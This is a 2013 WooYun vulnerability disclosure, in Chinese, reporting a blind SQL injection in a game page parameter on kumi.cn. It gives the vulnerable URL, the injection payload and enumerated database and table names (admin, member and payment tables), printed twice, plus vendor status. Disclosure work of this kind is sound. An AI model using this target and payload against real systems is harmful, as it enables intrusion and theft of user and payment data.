漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045281
漏洞标题:酷米网SQL注入漏洞可拿到服务器权限
相关厂商:kumi.cn
漏洞作者: Ebon_Wolf
提交时间:2013-12-09 11:54
修复时间:2013-12-14 11:54
公开时间:2013-12-14 11:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-14: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
酷米网游戏页面参数未过滤导致SQL注入漏洞
详细说明:
漏洞测试地址:
www.kumi.cn/360/xiaoyouxi/game.php?content=17613
先说下:只做安全测试不拿shell!!!!
漏洞测试相关结果:
Place: GET
Parameter: content
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=17613 AND 3739=3739
available databases [15]:
[*] information_schema
[*] kumi_app
[*] kumi_cms2
[*] kumi_dingzhi
[*] kumi_eduflash
[*] kumi_eduflash1
[*] kumi_ipad_donghua
[*] kumi_news
[*] kumi_search
[*] kumi_tudou
[*] kumi_upload
[*] miyadalu
[*] mysql
[*] test
[*] xiaoyouxi
初步检测标段信息:
Database: kumi_cms2
[124 tables]
+---------------------------------------+
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cooperate |
| cms_c_down |
| cms_c_flash |
| cms_c_flv |
| cms_c_group |
| cms_c_info |
| cms_c_ku6video |
| cms_c_news |
| cms_c_photo |
| cms_c_picture |
| cms_c_product |
| cms_c_program |
| cms_c_star |
| cms_c_upload |
| cms_c_video |
| cms_c_vod |
| cms_c_voting |
| cms_c_wallpaper |
| cms_c_wallpaper_photo |
| cms_c_yunshi |
| cms_cache_count |
| cms_category |
| cms_collect |
| cms_comment |
| cms_content |
| cms_content_count |
| cms_content_position |
| cms_content_tag |
| cms_copyfrom |
| cms_datasource |
| cms_digg |
| cms_digg_log |
| cms_donghua_pic |
| cms_donghua_pic_bak |
| cms_editor_data |
| cms_hits |
| cms_ipbanned |
| cms_keylink |
| cms_keyword |
| cms_log |
| cms_member |
| cms_member_cache |
| cms_member_detail |
| cms_member_group |
| cms_member_group_extend |
| cms_member_group_priv |
| cms_member_info |
| cms_menu |
| cms_model |
| cms_model_field |
| cms_module |
| cms_mood |
| cms_mood_data |
| cms_order |
| cms_order_deliver |
| cms_order_log |
| cms_pay_card |
| cms_pay_exchange |
| cms_pay_payment |
| cms_pay_pointcard_type |
| cms_pay_stat |
| cms_pay_user_account |
| cms_player |
| cms_position |
| cms_process |
| cms_process_status |
| cms_recommend |
| cms_recommend_info |
| cms_recommend_pic |
| cms_recommend_type |
| cms_role |
| cms_search |
| cms_search_type |
| cms_session |
| cms_sohu |
| cms_sohu_list |
| cms_special |
| cms_special_content |
| cms_status |
| cms_times |
| cms_type |
| cms_urlrule |
| cms_workflow |
| cms_zw_vote |
| cms_zw_voteip |
| disney_diaocha |
| kumi_bless |
| kumi_dell |
| kumi_ef |
| kumi_jiajia |
| kumi_mood |
| kumi_mood_ranking |
| kumi_ndj |
| kumi_player |
| kumi_player_bak |
| kumi_program_bbs_mapping |
| kumi_program_flash_mapping |
| kumi_program_flv_mapping |
| kumi_program_group_mapping |
| kumi_program_photo_mapping |
| kumi_program_star_mapping |
| kumi_program_type_mapping |
| kumi_risi |
| kumi_uploadvideo |
| last_video |
| nicaihua_ip |
| update_contents |
| yunshi |
+---------------------------------------+
太多信息了就不深入了。
漏洞证明:
漏洞测试地址:
www.kumi.cn/360/xiaoyouxi/game.php?content=17613
漏洞测试相关结果:
Place: GET
Parameter: content
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=17613 AND 3739=3739
available databases [15]:
[*] information_schema
[*] kumi_app
[*] kumi_cms2
[*] kumi_dingzhi
[*] kumi_eduflash
[*] kumi_eduflash1
[*] kumi_ipad_donghua
[*] kumi_news
[*] kumi_search
[*] kumi_tudou
[*] kumi_upload
[*] miyadalu
[*] mysql
[*] test
[*] xiaoyouxi
初步检测标段信息:
Database: kumi_cms2
[124 tables]
+---------------------------------------+
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cooperate |
| cms_c_down |
| cms_c_flash |
| cms_c_flv |
| cms_c_group |
| cms_c_info |
| cms_c_ku6video |
| cms_c_news |
| cms_c_photo |
| cms_c_picture |
| cms_c_product |
| cms_c_program |
| cms_c_star |
| cms_c_upload |
| cms_c_video |
| cms_c_vod |
| cms_c_voting |
| cms_c_wallpaper |
| cms_c_wallpaper_photo |
| cms_c_yunshi |
| cms_cache_count |
| cms_category |
| cms_collect |
| cms_comment |
| cms_content |
| cms_content_count |
| cms_content_position |
| cms_content_tag |
| cms_copyfrom |
| cms_datasource |
| cms_digg |
| cms_digg_log |
| cms_donghua_pic |
| cms_donghua_pic_bak |
| cms_editor_data |
| cms_hits |
| cms_ipbanned |
| cms_keylink |
| cms_keyword |
| cms_log |
| cms_member |
| cms_member_cache |
| cms_member_detail |
| cms_member_group |
| cms_member_group_extend |
| cms_member_group_priv |
| cms_member_info |
| cms_menu |
| cms_model |
| cms_model_field |
| cms_module |
| cms_mood |
| cms_mood_data |
| cms_order |
| cms_order_deliver |
| cms_order_log |
| cms_pay_card |
| cms_pay_exchange |
| cms_pay_payment |
| cms_pay_pointcard_type |
| cms_pay_stat |
| cms_pay_user_account |
| cms_player |
| cms_position |
| cms_process |
| cms_process_status |
| cms_recommend |
| cms_recommend_info |
| cms_recommend_pic |
| cms_recommend_type |
| cms_role |
| cms_search |
| cms_search_type |
| cms_session |
| cms_sohu |
| cms_sohu_list |
| cms_special |
| cms_special_content |
| cms_status |
| cms_times |
| cms_type |
| cms_urlrule |
| cms_workflow |
| cms_zw_vote |
| cms_zw_voteip |
| disney_diaocha |
| kumi_bless |
| kumi_dell |
| kumi_ef |
| kumi_jiajia |
| kumi_mood |
| kumi_mood_ranking |
| kumi_ndj |
| kumi_player |
| kumi_player_bak |
| kumi_program_bbs_mapping |
| kumi_program_flash_mapping |
| kumi_program_flv_mapping |
| kumi_program_group_mapping |
| kumi_program_photo_mapping |
| kumi_program_star_mapping |
| kumi_program_type_mapping |
| kumi_risi |
| kumi_uploadvideo |
| last_video |
| nicaihua_ip |
| update_contents |
| yunshi |
+---------------------------------------+
太多信息了就不深入了。
修复方案:
通过以上获取的信息你们应该知道怎么处理了。
game.php 参数过滤,SQL注入嘛,程序员懂的。
要过年啦,多给点赏钱就好。
版权声明:转载请注明来源 Ebon_Wolf@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-12-14 11:54
厂商回复:
最新状态:
2013-12-16:已经修改了。多谢